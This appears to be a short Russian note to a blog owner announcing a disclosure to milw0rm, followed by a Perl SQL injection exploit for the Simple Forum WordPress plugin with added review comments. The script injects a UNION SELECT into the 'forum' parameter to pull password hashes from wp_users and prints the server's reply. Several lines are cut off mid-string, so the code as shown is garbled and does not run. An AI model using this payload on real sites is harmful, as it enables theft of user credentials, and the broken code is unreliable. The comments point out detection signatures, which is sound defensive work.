Добрый день. Я нашел уязвимость в форме Simple Forum для движка WordPress.
Решил первыми осведомить вас! :)
Через пару минут буду отсылать на milw0rm
#!/usr/bin/perl
# Proof-of-concept for a SQL injection in the Simple Forum WordPress plugin
# (the versions named in the banner below). It sends a single crafted GET
# request and prints whatever the server answers; per the banner, the chosen
# user's password hash is expected to show up in the response body.
#
# NOTE(review): there is no `use strict; use warnings;` — every variable in
# this script is an undeclared package global. Several lines further down are
# also cut off on this page (unterminated string literals), so the script as
# shown does not parse; the code is kept byte-for-byte and only annotated.
use IO::Socket;
# Usage banner: the script needs four positional arguments (assigned below)
# and exits after printing the banner when fewer are given.
if (@ARGV <4)
{
print q(
###############################################################################
Simple Forum (for WordPress) sql-inject exploit (public version)
Tested on SF version 1.0, 1.1, 1.9 and WordPress 2.1.0, 2.1.1, 2.1.2
This exploit gives you selected user passwd hash,
for more features use Private Version
Discovered and coded by FrenzY ( [email protected])
— Public Version —
ex: if http://www.somefuckingblog.com/?page_id=3
cmd> perl simpleforum_wp.pl http://www.somefuckingblog.com / 1 3 > sfb.txt
(i recomend to use file output, because result may be non-readable from the
CMD :-))
###############################################################################
);
exit;
}
###############################################################################
# Positional arguments: the host (with or without an http:// prefix), the
# blog's base path, the target row's wp_users.ID, and the page_id of the
# forum page.
$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
$pid = $ARGV[3];
# Strip a leading http:// so $serv can be used directly as a host name. The
# /e flag makes the (empty) replacement run as Perl code; with an empty
# replacement this is just a plain deletion. Only http:// is handled — any
# other scheme is left in place.
$serv =~ s/(http:\/\/)//eg;
print "\r\n";
print "We are going to make a sql-inject at $serv now\r\n";
# What follows builds the request path as $dir?page_id=$pid&forum=<payload>$uid,
# where the payload is a URL-encoded `... UNION SELECT ... user_pass ... FROM
# wp_users WHERE ID=` — the vulnerable input is the `forum` query parameter.
# From the defender's side, a UNION SELECT against wp_users arriving in the
# `forum` parameter is the signature to alert on in access logs or WAF rules.
# The request is then written as a raw HTTP/1.1 GET to a TCP socket on port
# 80 (bare LF line endings, `Connection: close`), and $i is assigned but never
# read anywhere in the visible code.
# NOTE(review): the string literal opened on the next line is never closed on
# this page (its tail was apparently lost in extraction), which shifts every
# later quote; the lines below are left untouched rather than guessed at.
print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$path = $dir;
$path .= '?page_id=';
$path .= $pid;
$path .=
'&forum=1%20and%201=0%20UNION%20SELECT%201,user_pass,3,4,5,6,7%20FROM%20wp_users%20WHERE%20ID=';
$path .= $uid;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv",
PeerPort => "80") || die "[-] CONNECT FAILED :-(\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: /\n";
print $socket "Connection: close\n\n";
$i = 0;
while ($answer = <$socket>)
{
if ($answer =~ /Currently Online/) { print "- - - - - - - - - - - - - - - -
print "[-] EXPLOITING FAILED :-( \r\n";
print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
–
Love,
Ivan